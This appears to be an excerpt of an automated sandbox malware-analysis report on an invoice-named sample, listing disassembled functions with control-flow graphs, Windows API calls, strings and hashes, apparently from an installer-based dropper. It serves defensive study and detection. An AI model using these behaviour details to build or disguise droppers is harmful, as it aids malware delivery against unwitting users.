                                  • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                  • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                  • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE
                                  Function 00405D15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76stringwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 757 405d15-405d21 758 405df2-405df6 757->758 759 405d27-405d3a 757->759 760 405d46-405d56 lstrlenW 759->760 761 405d3c-405d41 call 405e95 759->761 763 405d58-405d67 lstrlenW 760->763 764 405d7b 760->764 761->760 765 405d6d-405d79 lstrcatW 763->765 766 405def-405df1 763->766 767 405d80-405d83 764->767 765->767 766->758 768 405d92-405d95 767->768 769 405d85-405d8c SetWindowTextW 767->769 770 405d97-405ddb SendMessageW * 3 768->770 771 405ddd-405ddf 768->771 769->768 770->771 771->766 772 405de1-405de7 771->772 772->766
                                  APIs
                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                  • SendMessageW.USER32(00010480), ref: 00405DB3
                                  • SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                  • SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 1759915248-185127731
                                  • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                  • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                  • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                  • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                  Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 773 40291d-402934 call 403002 776 402ea1-402ea5 773->776 777 40293a-40294b 773->777 782 402eab-402eb7 776->782 779 402951-402965 call 406c00 777->779 780 402aa2-402aac 777->780 779->780 786 40296b-402973 779->786 785 402ab5-402aba 780->785 787 402ad3-402ae2 SetFilePointer 785->787 788 402abc-402ac1 785->788 789 402975-40297a 786->789 787->780 790 402ac3-402ac6 788->790 791 402ac8-402ad1 788->791 792 402980-40299c ReadFile 789->792 793 402a33-402a37 789->793 790->787 790->791 791->780 792->780 794 4029a2-4029ac 792->794 795 402a39-402a3b 793->795 796 402a4c-402a5b call 406923 793->796 794->780 798 4029b2-4029bf 794->798 795->796 799 402a3d-402a46 call 40645f 795->799 796->780 806 402a5d-402a61 796->806 801 402ae4-402aee call 4065fa 798->801 802 4029c5-4029dc MultiByteToWideChar 798->802 799->780 808 402a48 799->808 801->776 801->782 802->806 807 4029de-4029e4 802->807 810 402a65-402a69 806->810 811 4029e6-4029f4 807->811 808->796 810->801 812 402a6b-402a76 810->812 811->810 813 4029f6-402a2f SetFilePointer MultiByteToWideChar 811->813 812->785 814 402a78-402a7d 812->814 813->811 815 402a31 813->815 814->785 816 402a7f-402a92 814->816 815->806 816->780 817 402a94-402a9c 816->817 817->780 817->789
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$ByteCharMultiPointerWide$Read
                                  • String ID: 9
                                  • API String ID: 1439708474-2366072709
                                  • Opcode ID: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                  • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                  • Opcode Fuzzy Hash: e380a6304de75cf0a531b116984dfc1ce0981d79b9e21712f5d5f7ee8832471f
                                  • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A
                                  Function 00406179 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 818 406179-406199 GetSystemDirectoryW 819 4061b3 818->819 820 40619b-40619d 818->820 821 4061b5 819->821 820->819 822 40619f-4061aa 820->822 824 4061ba-4061e7 wsprintfW LoadLibraryExW 821->824 822->821 823 4061ac-4061b1 822->823 823->824
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • wsprintfW.USER32 ref: 004061CC
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                  • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                  • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                  • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C
                                  Function 00406A31 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 825 406a31-406a3d 826 406a3e-406a70 GetTickCount GetTempFileNameW 825->826 827 406a72-406a74 826->827 828 406a7b 826->828 827->826 829 406a76-406a79 827->829 830 406a7d-406a80 828->830 829->830
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00406A4D
                                  • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CAF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406A68
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A36
                                  • a, xrefs: 00406A46
                                  • n, xrefs: 00406A3F
                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                  • API String ID: 1716503409-1137806429
                                  • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                  • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                  • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                  • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4
                                  Function 00403148 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 831 403148-403181 832 403190-4031a4 call 406923 831->832 833 403183-40318b call 403131 831->833 837 403354 832->837 838 4031aa-4031b0 832->838 833->832 841 403356 837->841 839 4032f6-4032f8 838->839 840 4031b6-4031dd GetTickCount call 407c4f 838->840 843 4032fa-4032fc 839->843 844 40333d-403352 call 40311b 839->844 848 4032ee-4032f0 840->848 850 4031e3-4031fa call 40311b 840->850 845 403357-403361 841->845 843->848 849 4032fe 843->849 844->837 844->848 848->845 852 403303-403313 call 40311b 849->852 850->837 858 403200-40320e 850->858 852->837 857 403315-403325 call 4069e6 852->857 863 403327-403335 857->863 864 403339-40333b 857->864 860 403218-403234 call 406e83 858->860 867 4032f2-4032f4 860->867 868 40323a-40325a GetTickCount 860->868 863->852 866 403337 863->866 864->841 866->848 867->841 869 4032a7-4032ad 868->869 870 40325c-403265 868->870 871 4032e6-4032e8 869->871 872 4032af-4032b1 869->872 873 403267-403269 870->873 874 40326b-4032a3 MulDiv wsprintfW call 405d15 870->874 871->848 871->850 875 4032b3-4032bc call 4069e6 872->875 876 4032cb-4032d3 872->876 873->869 873->874 874->869 881 4032c1-4032c3 875->881 879 4032d7-4032de 876->879 879->860 882 4032e4 879->882 881->864 883 4032c5-4032c9 881->883 882->848 883->879
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004031B6
                                  • GetTickCount.KERNEL32 ref: 00403245
                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                  • wsprintfW.USER32 ref: 00403286
                                    • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CountTick$FilePointerwsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 999035486-2449383134
                                  • Opcode ID: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                  • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                  • Opcode Fuzzy Hash: d68cc013f84ddd4098e5109656f36c67c49075f4e8b7d96d56d891499f5968f3
                                  • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E
                                  Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 884 40141e-401456 call 4062b3 886 40145b-40145d 884->886 887 401463-40146d 886->887 888 401527-401530 886->888 889 401493-4014a4 887->889 890 40146f-401491 RegEnumValueW 887->890 892 4014ce-4014d6 RegEnumKeyW 889->892 890->889 891 401503-401512 RegCloseKey 890->891 891->888 893 4014a6-4014a8 892->893 894 4014d8-4014eb RegCloseKey call 4068c1 892->894 893->891 895 4014aa-4014c1 call 40141e 893->895 900 401514-40151e 894->900 901 4014ed-401501 RegDeleteKeyW 894->901 895->894 902 4014c3-4014cd 895->902 900->888 901->888 902->892
                                  APIs
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                  • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                  • RegCloseKey.ADVAPI32(?), ref: 00401507
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                  • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                  • Opcode Fuzzy Hash: b7b1047d7b61caa8fe547ce2748af7c62e527a8cd6870cf7767c785c66b0234b
                                  • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A
                                  Function 0040225D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 903 40225d-402268 904 40233e-402343 903->904 905 40226e-402289 call 40303e * 2 903->905 906 402345-40234a call 405d15 904->906 915 40228b-402296 GetModuleHandleW 905->915 916 40229c-4022aa LoadLibraryExW 905->916 912 402ea5-402eb7 906->912 917 4022b0-4022c2 call 406244 915->917 920 402298 915->920 916->917 918 402335-40233c 916->918 923 4022c4-4022ca 917->923 924 402306-40230c call 405d15 917->924 918->906 920->916 925 4022e6-402304 923->925 926 4022cc-4022e0 call 405d15 923->926 929 402311-402315 924->929 925->929 926->929 937 4022e2-4022e4 926->937 929->912 930 40231b-402323 call 403cb1 929->930 930->912 936 402329-402330 FreeLibrary 930->936 936->912 937->929
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                    • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                    • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 00405D8C
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480), ref: 00405DB3
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,0000104D,00000000,?), ref: 00405DCE
                                    • Part of subcall function 00405D15: SendMessageW.USER32(00010480,00001013,00000000,00000000), ref: 00405DDB
                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 334405425-3542424732
                                  • Opcode ID: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                  • Instruction ID: a1346d69ca964d54404f15d64018e456dfdc0067b09238f3cf27b8b50b8900a8
                                  • Opcode Fuzzy Hash: 3e76937fbf533376ef978b035049d7e49d7738bfb9437f493f5f4d1363c42f20
                                  • Instruction Fuzzy Hash: 6021F832648301A7C711AF619E49A3F76A4AFD8721F60013FF951B12D0DBBC98029A5F
                                  Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnC132.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 00402710
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnC132.tmp,?,?,00000011,00000002), ref: 0040271D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CloseValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp
                                  • API String ID: 2655323295-1777003228
                                  • Opcode ID: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                  • Instruction ID: 31e5bc54edfcad7c1b31027c56fe611cf8d7432ac604a3e5fe606c4c5445a84e
                                  • Opcode Fuzzy Hash: 64a49f58656c0e9171d0315a18fdd9a6423080c1d69df6ea3e2099172f486d4a
                                  • Instruction Fuzzy Hash: 0F210032604300ABD7119FA0CD45A2FBBE8EB88760F10083EF540F31C0C7B99905879A
                                  Function 004068C1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                  • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                    • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                    • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                    • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
